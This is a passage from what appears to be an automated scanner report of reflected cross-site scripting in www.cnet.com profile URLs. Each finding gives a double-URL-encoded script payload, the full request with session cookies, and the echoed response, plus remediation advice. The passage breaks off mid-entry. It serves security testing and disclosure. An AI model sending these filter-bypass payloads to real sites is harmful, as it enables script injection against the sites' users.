HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:05 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:05 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31126
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>antuan.goodwinb00ce<script>alert(1)</script>4f125594f0d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3089b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96fecca6cf9 was submitted in the REST URL parameter 2. This input was echoed as 3089b"><script>alert(1)</script>96fecca6cf9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/audiodonald3089b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e96fecca6cf9/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:20 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:21 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=992 Connection: Keep-Alive Content-Length: 31092
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="audiodonald3089b"><script>alert(1)</script>96fecca6cf9"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4fc4c%253cscript%253ealert%25281%2529%253c%252fscript%253ec36086affe7 was submitted in the REST URL parameter 2. This input was echoed as 4fc4c<script>alert(1)</script>c36086affe7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/audiodonald4fc4c%253cscript%253ealert%25281%2529%253c%252fscript%253ec36086affe7/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:22 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:22 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=997 Connection: Keep-Alive Content-Length: 31075
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>audiodonald4fc4c<script>alert(1)</script>c36086affe7's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 771bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e615ab5f3 was submitted in the REST URL parameter 2. This input was echoed as 771bc"><script>alert(1)</script>c1e615ab5f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bharwoodcbs771bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec1e615ab5f3/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:32 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:32 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=967 Connection: Keep-Alive Content-Length: 31098
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="bharwoodcbs771bc"><script>alert(1)</script>c1e615ab5f3"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d7ee1%253cscript%253ealert%25281%2529%253c%252fscript%253e6123677fe01 was submitted in the REST URL parameter 2. This input was echoed as d7ee1<script>alert(1)</script>6123677fe01 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bharwoodcbsd7ee1%253cscript%253ealert%25281%2529%253c%252fscript%253e6123677fe01/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:34 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:34 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=1000 Connection: Keep-Alive Content-Length: 31105
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>bharwoodcbsd7ee1<script>alert(1)</script>6123677fe01's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 58838%253cscript%253ealert%25281%2529%253c%252fscript%253e93d58fcfbc1 was submitted in the REST URL parameter 2. This input was echoed as 58838<script>alert(1)</script>93d58fcfbc1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bonnie.cha58838%253cscript%253ealert%25281%2529%253c%252fscript%253e93d58fcfbc1/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:31 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31046
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>bonnie.cha58838<script>alert(1)</script>93d58fcfbc1's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e9cd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e258cd4f45b7 was submitted in the REST URL parameter 2. This input was echoed as 7e9cd"><script>alert(1)</script>258cd4f45b7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/bonnie.cha7e9cd%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e258cd4f45b7/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:12:29 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:12:30 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=983 Connection: Keep-Alive Content-Length: 31118
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="bonnie.cha7e9cd"><script>alert(1)</script>258cd4f45b7"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9e964%253cscript%253ealert%25281%2529%253c%252fscript%253efb22b6abe35 was submitted in the REST URL parameter 2. This input was echoed as 9e964<script>alert(1)</script>fb22b6abe35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/briancnet9e964%253cscript%253ealert%25281%2529%253c%252fscript%253efb22b6abe35/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:13 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=943 Connection: Keep-Alive Content-Length: 31036
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>briancnet9e964<script>alert(1)</script>fb22b6abe35's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3686b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b5c50c0a91 was submitted in the REST URL parameter 2. This input was echoed as 3686b"><script>alert(1)</script>8b5c50c0a91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/briancnet3686b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e8b5c50c0a91/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:10:12 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:10:12 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=958 Connection: Keep-Alive Content-Length: 31148
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="briancnet3686b"><script>alert(1)</script>8b5c50c0a91"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb59c719187e was submitted in the REST URL parameter 2. This input was echoed as dd9cb"><script>alert(1)</script>b59c719187e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/candacelombardidd9cb%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb59c719187e/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:47 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:47 GMT Edge-Control: no-cache Cneonction: close Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=938 Connection: Keep-Alive Content-Length: 31206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="candacelombardidd9cb"><script>alert(1)</script>b59c719187e"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 45ac8%253cscript%253ealert%25281%2529%253c%252fscript%253e06a4f8a6680 was submitted in the REST URL parameter 2. This input was echoed as 45ac8<script>alert(1)</script>06a4f8a6680 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/candacelombardi45ac8%253cscript%253ealert%25281%2529%253c%252fscript%253e06a4f8a6680/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:13:48 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:13:48 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=972 Connection: Keep-Alive Content-Length: 31174
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>candacelombardi45ac8<script>alert(1)</script>06a4f8a6680's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99027%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed014422ea0d was submitted in the REST URL parameter 2. This input was echoed as 99027"><script>alert(1)</script>d014422ea0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
